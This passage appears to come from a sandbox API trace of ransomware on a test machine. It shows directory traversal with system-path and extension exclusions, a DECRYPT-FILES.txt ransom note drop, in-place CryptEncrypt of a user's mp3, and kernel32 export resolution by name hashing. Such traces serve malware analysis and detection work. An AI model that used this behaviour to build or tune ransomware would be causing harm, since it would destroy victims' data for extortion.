(lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.384] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.385] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51280f40, ftCreationTime.dwHighDateTime=0x1d4cefb, ftLastAccessTime.dwLowDateTime=0x5671c9c0, ftLastAccessTime.dwHighDateTime=0x1d4ca71, ftLastWriteTime.dwLowDateTime=0x5671c9c0, ftLastWriteTime.dwHighDateTime=0x1d4ca71, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="X7DdBKuwCUHgUBoP", cAlternateFileName="X7DDBK~1")) returned 1 [0085.385] lstrcmpW (lpString1="X7DdBKuwCUHgUBoP", lpString2=".") returned 1 [0085.385] lstrcmpW (lpString1="X7DdBKuwCUHgUBoP", lpString2="..") returned 1 [0085.385] lstrcatW (in: lpString1="X7DdBKuwCUHgUBoP", lpString2="\\" | out: lpString1="X7DdBKuwCUHgUBoP\\") returned="X7DdBKuwCUHgUBoP\\" [0085.385] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpString2="X7DdBKuwCUHgUBoP\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\" [0085.385] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpSrch="\\Program Files") returned 0x0 [0085.385] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpSrch=":\\Windows") returned 0x0 [0085.385] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpSrch="\\Games\\") returned 0x0 [0085.385] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpSrch="\\Tor Browser\\") returned 0x0 [0085.385] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpSrch="\\ProgramData\\") returned 0x0 [0085.385] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0085.385] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0085.385] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0085.385] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpSrch="\\All Users") returned 0x0 [0085.385] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpSrch="\\IETldCache\\") returned 0x0 [0085.385] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpSrch="\\Local Settings\\") returned 0x0 [0085.385] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpSrch="\\AppData\\Local") returned 0x0 [0085.385] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpSrch="AhnLab") returned 0x0 [0085.385] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0085.385] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\") returned 75 [0085.385] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.385] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\\\jkbimi8.tmp") returned 87 [0085.385] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\x7ddbkuwcuhgubop\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x438 [0085.394] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\") returned 75 [0085.394] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0085.394] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\\\DECRYPT-FILES.txt") returned 93 [0085.394] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\x7ddbkuwcuhgubop\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0085.394] WriteFile (in: hFile=0x43c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0085.395] CloseHandle (hObject=0x43c) returned 1 [0085.395] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\") returned 75 [0085.395] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\*" [0085.395] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51280f40, ftCreationTime.dwHighDateTime=0x1d4cefb, ftLastAccessTime.dwLowDateTime=0xaf18f120, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf18f120, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b58 [0085.395] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.395] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51280f40, ftCreationTime.dwHighDateTime=0x1d4cefb, ftLastAccessTime.dwLowDateTime=0xaf18f120, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf18f120, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.395] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.395] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.395] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf18f120, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaf18f120, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf18f120, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0085.395] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0085.396] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf5fd380, ftCreationTime.dwHighDateTime=0x1d4cec7, ftLastAccessTime.dwLowDateTime=0xbcdbfd30, ftLastAccessTime.dwHighDateTime=0x1d4d1fa, ftLastWriteTime.dwLowDateTime=0xbcdbfd30, ftLastWriteTime.dwHighDateTime=0x1d4d1fa, nFileSizeHigh=0x0, nFileSizeLow=0x452c, dwReserved0=0x0, dwReserved1=0x0, cFileName="gT8583vJq.mp3", cAlternateFileName="GT8583~1.MP3")) returned 1 [0085.396] lstrcmpiW (lpString1="gT8583vJq.mp3", lpString2="DECRYPT-FILES.txt") returned 1 [0085.396] lstrcmpiW (lpString1="gT8583vJq.mp3", lpString2="autorun.inf") returned 1 [0085.396] lstrcmpiW (lpString1="gT8583vJq.mp3", lpString2="boot.ini") returned 1 [0085.396] lstrcmpiW (lpString1="gT8583vJq.mp3", lpString2="desktop.ini") returned 1 [0085.396] lstrcmpiW (lpString1="gT8583vJq.mp3", lpString2="ntuser.dat") returned -1 [0085.396] lstrcmpiW (lpString1="gT8583vJq.mp3", lpString2="iconcache.db") returned -1 [0085.396] lstrcmpiW (lpString1="gT8583vJq.mp3", lpString2="bootsect.bak") returned 1 [0085.396] lstrcmpiW (lpString1="gT8583vJq.mp3", lpString2="ntuser.dat.log") returned -1 [0085.396] lstrcmpiW (lpString1="gT8583vJq.mp3", lpString2="thumbs.db") returned -1 [0085.396] lstrcmpiW (lpString1="gT8583vJq.mp3", lpString2="Bootfont.bin") returned 1 [0085.396] lstrlenW (lpString="gT8583vJq.mp3") returned 13 [0085.396] lstrcmpiW (lpString1="mp3", lpString2="lnk") returned 1 [0085.396] lstrcmpiW (lpString1="mp3", lpString2="exe") returned 1 [0085.396] lstrcmpiW (lpString1="mp3", lpString2="sys") returned -1 [0085.396] lstrcmpiW (lpString1="mp3", lpString2="dll") returned 1 [0085.396] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\") returned 75 [0085.396] lstrlenW (lpString="gT8583vJq.mp3") returned 13 [0085.396] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\" [0085.396] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpString2="gT8583vJq.mp3" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\gT8583vJq.mp3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\gT8583vJq.mp3" [0085.396] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.396] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\gT8583vJq.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\x7ddbkuwcuhgubop\\gt8583vjq.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0085.397] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2d978 | out: lpFileSize=0x3f2d978*=17708) returned 1 [0085.397] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0085.397] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.397] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.397] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.397] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.397] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2d8e0*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2d8e0*=0x100) returned 1 [0085.397] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.398] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.398] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.399] CloseHandle (hObject=0x444) returned 1 [0085.399] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.399] WriteFile (in: hFile=0x440, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d900, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2d900*=0x108, lpOverlapped=0x0) returned 1 [0085.399] CloseHandle (hObject=0x0) returned 0 [0085.400] CloseHandle (hObject=0x440) returned 1 [0085.400] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.400] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.400] GetTickCount () returned 0x114dce8 [0085.400] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.400] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.400] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.401] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.401] lstrlenA (lpString="kernel32.dll") returned 12 [0085.401] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0085.401] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0085.401] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0085.401] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0085.401] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0085.401] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0085.401] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0085.401] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0085.401] lstrlenA (lpString="ADDATOMA") returned 8 [0085.401] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0085.401] lstrlenA (lpString="ADDATOMW") returned 8 [0085.401] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0085.401] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0085.401] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0085.401] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0085.401] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0085.402] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0085.402] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0085.402] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0085.402] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0085.402] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0085.402] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0085.402] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0085.402] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0085.402] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0085.402] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0085.402] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0085.402] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0085.402] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0085.402] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0085.402] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0085.402] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0085.402] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0085.402] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0085.402] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0085.402] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0085.402] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0085.402] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0085.402] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0085.402] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0085.402] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0085.402] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0085.402] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0085.402] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0085.402] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0085.402] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0085.402] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0085.402] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0085.402] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0085.402] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0085.402] lstrlenA (lpString="BACKUPREAD") returned 10 [0085.402] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0085.403] lstrlenA (lpString="BACKUPSEEK") returned 10 [0085.403] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0085.403] lstrlenA (lpString="BACKUPWRITE") returned 11 [0085.403] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0085.403] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0085.403] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0085.403] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0085.403] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0085.403] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0085.403] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0085.403] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0085.403] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0085.403] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0085.403] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0085.403] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0085.403] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0085.403] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0085.403] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0085.403] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0085.403] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0085.403] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0085.403] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0085.403] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0085.403] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0085.403] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0085.403] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0085.403] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0085.403] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0085.403] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0085.403] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0085.403] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0085.403] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0085.403] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0085.403] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0085.403] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0085.403] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0085.403] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0085.404] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0085.404] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0085.404] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0085.404] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0085.404] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0085.404] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0085.404] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") 